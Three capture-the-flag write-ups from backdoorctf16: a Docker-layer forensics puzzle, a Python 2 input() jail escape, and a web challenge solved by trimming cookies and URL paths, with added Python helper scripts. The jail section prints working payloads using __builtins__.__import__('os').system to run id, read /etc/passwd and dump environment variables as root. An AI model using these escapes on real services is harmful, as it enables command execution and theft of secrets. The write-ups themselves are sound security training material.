Jun 8, 2016 - backdoorctf16 : Busybee

Author: dade

Publish Date: 2016-06-08

Category: Forensics
Points: 150
Description:

A deadly virus is killing bees in Busybee’s village Busybox, India. Unfortunately, you have to go to the village to fight the infection. Get the flag virus out of the infected files.
Village address: http://hack.bckdr.in/BUSYBEE/infected.tar
Created by: Ashish Chaudhary


Let’s unpack our infected.tar and take a look around

drwxr-xr-x  3 dade dade 4096 Jun  4 12:50 2b0fbc0e1ac044737fd881cff8164bb5a2c7bfbf90c40c87de3c3435f2c6a94e
drwxr-xr-x  4 dade dade 4096 Jun  4 12:53 983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7
drwxr-xr-x 10 dade dade 4096 Jun  4 12:51 d51a083a3b01fe8c58086903595b91fc975de59a9e9ececec755df384a181026
-rw-r--r--  1 dade dade 1344 Jun  3 09:13 eaa21323de5e2cce7078df3af4dd292181114dfc94be761b948657efbe3af26b.json
-rw-r--r--  1 dade dade  373 Dec 31  1969 manifest.json
-rw-r--r--  1 dade dade  106 Dec 31  1969 repositories

The json files don’t really have much of interest in them; they look primarily like data from building the problem. Let’s dig into 2b0fbc0e…

[email protected]:~$ ls -la infected/2b0fbc0e1ac044737fd881cff8164bb5a2c7bfbf90c40c87de3c3435f2c6a94e
-rw-r--r-- 1 dade dade  464 Jun  3 09:13 json
-rw-r--r-- 1 dade dade 1024 Jun  3 09:13 layer.tar
-rw-r--r-- 1 dade dade    3 Jun  3 09:13 VERSION

file layer.tar says “data”, tar xvf layer.tar is unable to extract anything, and xxd layer.tar shows us that the file is all 0s. Nothing of interest in json or VERSION either.

Let’s move on to 983179bd…

-rw-r--r-- 1 dade dade     907 Jun  3 09:13 json
-rw-r--r-- 1 dade dade 1035776 Jun  3 09:13 layer.tar
-rw-r--r-- 1 dade dade       3 Jun  3 09:13 VERSION

json and VERSION are probably still not particularly helpful for us, but let’s unpack this layer.tar

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ tar xvf layer.tar 

.ash_history looks like a shell history file, let’s see if anything interesting is in there.

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ cat root/.ash_history
not so easy bru - the infections is intense


Hmm. This tarball also had two binaries in it. Let’s see if there is a reason those binaries specifically were included, by checking them out with strings. Given the premise of the challenge, that a “virus” had “infected” files, binaries are a common place to hide things.

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ strings bin/sha1sum 

Well that was easy: the virus flag was in the infected binaries. Just sha256 that string and submit.
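The layout unpacked above (manifest.json, repositories, and a json, VERSION and layer.tar under each hash-named directory) is what docker save produces, with each layer.tar a nested tar. As an added example that is not part of the original writeup, the Python 3 script below walks every layer listed in manifest.json, pulls printable runs out of regular files the way strings(1) does, and reports the ones matching a pattern; the in-memory sample image, its marker string and the all-zero placeholder layer (like the one under 2b0fbc0e…) are constructed here.

```python
import io
import json
import re
import tarfile

# Printable runs of 8+ bytes, the same idea as `strings -n 8`
STRING_RE = re.compile(rb"[\x20-\x7e]{8,}")

def _add_bytes(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

def build_sample_image():
    """Constructed sample: a tiny `docker save`-style tarball built in memory."""
    layer = io.BytesIO()
    with tarfile.open(fileobj=layer, mode="w") as t:
        # a fake 'binary' with a marker string sitting between NUL padding
        _add_bytes(t, "bin/sha1sum", b"\x7fELF" + b"\x00" * 16
                   + b"flag_marker{constructed}" + b"\x00" * 8)
        _add_bytes(t, "root/.ash_history", b"ls -la\n")
    empty_layer = b"\x00" * 1024  # an all-zero layer.tar like the one under 2b0fbc0e...
    image = io.BytesIO()
    with tarfile.open(fileobj=image, mode="w") as t:
        manifest = [{"Layers": ["aaa/layer.tar", "bbb/layer.tar"]}]
        _add_bytes(t, "manifest.json", json.dumps(manifest).encode())
        _add_bytes(t, "aaa/layer.tar", empty_layer)
        _add_bytes(t, "bbb/layer.tar", layer.getvalue())
    return image.getvalue()

def scan_image(image_bytes, pattern):
    """Return [(layer, file, string)] for each printable string in a layer file
    that matches `pattern` (a bytes regex), following manifest.json's Layers."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(image_bytes), mode="r:") as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_name in (n for entry in manifest for n in entry["Layers"]):
            raw = image.extractfile(layer_name).read()
            try:
                layer = tarfile.open(fileobj=io.BytesIO(raw), mode="r:")
            except tarfile.ReadError:
                continue  # not a tar at all (a zero-filled layer opens as empty)
            with layer:
                for member in layer.getmembers():
                    if not member.isfile():
                        continue
                    data = layer.extractfile(member).read()
                    hits.extend((layer_name, member.name, s.decode())
                                for s in STRING_RE.findall(data) if re.search(pattern, s))
    return hits
```

Point scan_image at the bytes of a real infected.tar and a pattern for the flag format to get the same answer the manual strings run gave, with the layer and file it came from.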


This challenge is hosted permanently at Backdoor, so go find the flag yourself!

Jun 7, 2016 - backdoorctf16 : Worst-Pwn-Ever

Author: dade

Publish Date: 2016-06-07

Category: pwn
Points: 100
Description:

tocttou is an environmentalist. But some say he has a vicious motive and he uses nature to hide his dark side. We found a weird shell on his amazon (pun intended) web services. Can you tell us what he is up to? Tip: he might shut down the machine if he notices you - and he will (maybe in 45 seconds).
Access: nc hack.bckdr.in 9008
Created by: Ashish Chaudhary


When we first netcat into that service, we’re simply presented with a > prompt. Let’s try a couple of useful recon commands and see what happens.

[email protected]:~$ nc hack.bckdr.in 9008
> id
[email protected]:~$ 

Well that didn’t return anything, it just closed our session. Interesting. Let’s try another.

[email protected]:~$ nc hack.bckdr.in 9008
> whoami
NameError: name 'whoami' is not defined
[email protected]:~$ 

Well that’s interesting: we got ourselves a NameError and an angry message. I write a lot of Python, so NameError is familiar to me. It looks like we’re in a Python shell of some sort. A bit of googling around and I found a nice writeup about an old PlaidCTF challenge called “pyjail”, which gave me some valuable information on breaking out of Python jails. Let’s try to do an import.

[email protected]:~$ nc hack.bckdr.in 9008
> import os 
NameError: invalid syntax (<string>, line 1)
[email protected]:~$ 

Interesting, now we get an invalid syntax error instead of a name-not-defined error. Since the service prompts us for a line, I bet it is reading our input with Python 2’s input() builtin, which evaluates whatever we type as an expression (so a statement like import os is a syntax error, while a bare name like whoami is looked up and fails). Let’s see if we can manipulate that a bit.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__)
<module '__builtin__' (built-in)>import os
NameError: invalid syntax (<string>, line 1)
[email protected]:~$

Breaking out of the sandbox

Neat, now we see that we can access __builtins__. To learn more about which functions are built in, read the Python docs.

Let’s see how far we can take this and try to do a call directly from the builtins.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os'))
<module 'os' from '/usr/lib/python2.7/os.pyc'>^C
[email protected]:~$

Now we know we can import os. That’s great news for us: os gives us access to all sorts of useful system utilities.
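The three responses seen so far (NameError for whoami, invalid syntax for import os, evaluation of whatever is handed to input) all follow from Python 2’s input() being eval() over an expression. The Python 3 snippet below is an added example, not the challenge’s code: it classifies a line the way that reader does, lists the names an expression reaches (a filter that only looks for the import keyword sees none here, since __import__ is ordinary attribute access), and shows the mitigation of reading the line as a literal with ast.literal_eval instead of as code.

```python
import ast

def py2_input_would_eval(line):
    """Python 2's input() is eval(raw_input()), so it only accepts an expression.
    True: the line parses as an expression and would be evaluated (whoami ->
    NameError when the name is missing). False: it is a statement, which the
    service reported as 'invalid syntax' (import os)."""
    try:
        ast.parse(line, mode="eval")
        return True
    except SyntaxError:
        return False

def names_reached(line):
    """Names and attributes an expression touches. A filter that only looks for
    the import keyword never sees one here: __import__ is plain attribute access."""
    tree = ast.parse(line, mode="eval")
    names = {n.id for n in ast.walk(tree) if isinstance(n, ast.Name)}
    attrs = {n.attr for n in ast.walk(tree) if isinstance(n, ast.Attribute)}
    return sorted(names | attrs)

def hardened_read(line):
    """Mitigation: treat the line as data, never code. ast.literal_eval accepts
    only literals (strings, numbers, tuples, ...) and rejects names and calls."""
    try:
        return ("ok", ast.literal_eval(line))
    except (ValueError, SyntaxError) as exc:
        return ("rejected", type(exc).__name__)
```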

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("id"))
uid=0(root) gid=0(root) groups=0(root)
NameError: unexpected EOF while parsing (<string>, line 0)
[email protected]:~$

Here I hit enter because I wasn’t sure what that trailing 0 was doing there, which got us caught and kicked out. But that’s okay: we just ran the “id” command on the target and found out this Python script is running as root. Let’s try to get some other information from it.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("cat /etc/passwd"))
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
0input(__builtins__.__import__('os').system("ls -la ~"))       
total 16
drwx------  2 root root 4096 May  3 16:57 .
drwxr-xr-x 46 root root 4096 Jun  8 08:36 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile

I discovered here that the 0 we see is actually just another prompt where we can make another system call. I grabbed the list of users but didn’t see any usernames that looked particularly interesting. Our target is a guy named tocttou, and none of those accounts looked like they belonged to him. I then wanted to check out the contents of the root homedir, but it only had .bashrc and .profile. What else do we know about tocttou?


It is sometimes suggested that you use an environment variable to store sensitive information, which a script can then read when it needs it. This is a common tactic to avoid accidentally pushing your API keys or passwords to GitHub. We’re told in the challenge description that tocttou is a bit of an “environmentalist”, which is the hint that lets us wrap this all up.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("printenv"))


This challenge is hosted permanently at Backdoor, so go find the flag yourself!

Jun 7, 2016 - backdoorctf16 : Infinite Paths

Author: dade

Publish Date: 2016-06-07

Category: Web
Points: 100
Description:

cr4wl3r (a basilisk) once got pissed off with feignix (fawkes the feignix) and challenged him to find the flag that was hidden in the mysterious tunnels inside his lair, the chamber of secrets. feignix now flies inside the underground tunnels attempting to find the flag. See if you (Tom) can get to the flag first with some magic tricks. Will you be able to solve this Marvelous Riddle Tom? Go here
Created by: Arpit Singla


I stumbled into a bug with the problem while trying to solve this that enabled me to completely bypass the intended solution. The contents below are how the problem was meant to be solved.


We’re chucked into this path and simply told to keep roaming. Directory traversal attacks can be useful, except usually they don’t come right out and say “change directories.” Since we’re told to keep roaming, let’s try a few quick options. Let’s add another /path to the end of the url.

Want the flag? Here it is:
"Hunh! D0 y0u 7h1nk 17'5 7h1s e4sy?"

Surely that’s not the flag; it’s taunting us that it couldn’t be this easy. Classic red herring (the guys at SDSLabs really liked red herrings this year). Let’s also check out simply http://hack.bckdr.in/INFINITE-PATHS/. We’re presented with the same taunting message. I’d be lying if I said I didn’t go through and check almost every /path between 0 and 50 (the number of /path’s we’re presented with when the challenge begins). No luck traversing through all those directories, so it’s a good time to pull up Fiddler, though you could also use Burp Suite if you have it set up.

Once Fiddler was capturing traffic, I opened up a clean browser instance so that I could mimic my very first interaction with the site.

Here we can see that a ton of cookies are set. Fitting, since we’re a ton of directories deep into the site. Let’s send another request so that we can clone it, rather than manually transforming all those Set-Cookie headers into a Cookie header suitable for a GET request.

Now let’s go to the Raw tab and copy the entire request we just sent so that we can do some modifying. Copy the request, then go to the Composer tab and paste it in. Be sure to have one blank line at the end of your request, otherwise it’s not a valid request. Let’s start off by removing the first cookie we see on the list and see what happens.

Fascinating! We’ve gained useful information here. Let’s try to remove another cookie from the front of the list and see what happens.

Of course, that would have been too easy. Since there were a ton of /path’s in the URL and a ton of cookies, let’s count them both and see how they relate. I simply pasted the entire GET request into Sublime Text and did a find on /path to get a count, and a find on infinite_paths= to get a count of the cookies. In our original request we had 51 cookies and only 50 paths.


So we now know there were originally 51 cookies being set at once and 50 paths, and that when we removed one cookie so that count(cookies) == count(paths), we were presented with one character of a 50-character flag. To confirm this we’ll remove the first two cookies, and this time also remove one of the /paths.

We’re sending 49 paths and 49 cookies. Since they all have the same name, we’re effectively only sending the first infinite_paths cookie on our list; I just kept the entire list of them handy and continued to pop one off the front in order to keep my place.

Fantastic, our suspicion is confirmed and we can move on. You simply need to iterate through all 50 characters, popping one cookie off the front of the list (and one /path off the URL) every time. When we’ve finished we reach the last character of the flag.

When you put all the characters you’re presented with together, you should notice that the result doesn’t really make much sense: it begins with a period and ends with a capital letter. Let’s reverse it, which you can do quickly in Python like so:

python -c 'print "TheFlagYouFind"[::-1]'
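To automate the procedure above (keep count(cookies) == count(paths), pop one cookie off the front and one /path off the URL each round, then reverse), here is an added Python 3 example that is not from the original writeup. It folds the Set-Cookie lines into a Cookie request header with the duplicate names preserved, builds each raw request and collects the characters; the exact URL layout, the sample cookie values and the stand-in server that hands back one character when the counts match are assumptions constructed to mirror the behaviour described, not the real service.

```python
TAUNT = "Hunh! D0 y0u 7h1nk 17'5 7h1s e4sy?"

def cookie_header(set_cookie_lines):
    """Fold Set-Cookie response headers into one Cookie request header.
    Duplicate names are kept, in order; this challenge counts on that."""
    return "; ".join(line.split(";", 1)[0].strip() for line in set_cookie_lines)

def build_request(host, n_paths, set_cookie_lines):
    """Raw GET with n_paths '/path' segments (assumed layout) plus the cookies."""
    path = "/INFINITE-PATHS" + "/path" * n_paths + "/"
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header(set_cookie_lines)}\r\n\r\n")

def counts(raw_request):
    """(number of /path segments, number of infinite_paths cookies) in a request,
    the same two finds done by hand in the editor above."""
    return raw_request.count("/path"), raw_request.count("infinite_paths=")

def collect_flag(send, set_cookie_lines, n_paths):
    """One request per character: trim the cookie list from the front so that
    count(cookies) == count(paths), drop one /path per round, then reverse."""
    cookies = list(set_cookie_lines)
    chars = []
    for n in range(n_paths, 0, -1):
        cookies = cookies[len(cookies) - n:]  # pop from the front until n remain
        chars.append(send(build_request("hack.bckdr.in", n, cookies)))
    return "".join(chars)[::-1]

def fake_server(flag):
    """Constructed stand-in for the challenge (not the real service): returns the
    next character of the reversed flag when the counts match, the taunt otherwise."""
    rev = flag[::-1]
    def send(raw_request):
        paths, n_cookies = counts(raw_request)
        if paths != n_cookies or not 1 <= paths <= len(rev):
            return TAUNT
        return rev[len(rev) - paths]
    return send

# Constructed sample: one more cookie than there are /path segments, as observed
SAMPLE_SET_COOKIES = [f"infinite_paths=v{i}; Path=/" for i in range(6)]
```

Against the real service, send would be a function that writes the raw request to the socket and returns the response body, and the cookie list would be the 51 Set-Cookie lines captured in Fiddler.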

My Accidental Solution

During some testing, I accidentally sent a GET request that contained %20 at the end, immediately following the final /path. This presented me with a character of the flag. Upon a bit more investigation, I was able to obtain every character of the flag simply by putting something unexpected at the end of the string for every iteration of the /path list, completely bypassing the cookie challenge. This was not the intended solution and I informed the author.



This challenge is hosted permanently at Backdoor, so go find the flag yourself!